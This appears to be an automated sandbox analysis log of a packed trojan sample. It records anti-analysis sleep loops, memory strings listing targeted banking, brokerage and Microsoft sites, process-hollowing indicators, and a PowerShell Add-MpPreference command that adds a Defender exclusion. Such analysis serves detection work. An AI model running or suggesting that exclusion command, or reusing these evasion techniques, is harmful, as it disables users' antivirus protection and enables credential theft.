                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595938Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595813Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595438Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595328Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595218Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595001Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594876Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594751Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594626Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594501Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594376Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594251Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594126Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594001Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 593876Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 593751Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5658Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4119Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeWindow / User API: threadDelayed 2414Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeWindow / User API: threadDelayed 7372Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7900Thread sleep count: 2414 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -599842s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7900Thread sleep count: 7372 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -599706s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -599563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -599452s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -599344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -599235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -599110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -598985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -598860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -598735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -598610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -598485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -598360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -598235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -598110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -597985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -597860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -597735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -597610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -597485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -597360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -597235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -597047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -596909s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -596782s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -596657s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -596532s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -596407s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -596282s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -596157s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -596047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -595938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -595813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -595688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -595563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -595438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -595328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -595218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -595110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -595001s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -594876s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -594751s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -594626s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -594501s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -594376s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -594251s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -594126s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -594001s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -593876s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892Thread sleep time: -593751s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599842Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599706Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599563Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599452Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599235Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596909Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596782Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596657Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596532Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596407Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596282Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596157Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595938Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595813Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595438Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595328Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595218Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 595001Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594876Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594751Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594626Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594501Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594376Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594251Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594126Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 594001Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 593876Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 593751Jump to behavior
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849790363.0000000001457000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB9548 LdrInitializeThunk,LdrInitializeThunk,5_2_06DB9548
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"Jump to behavior
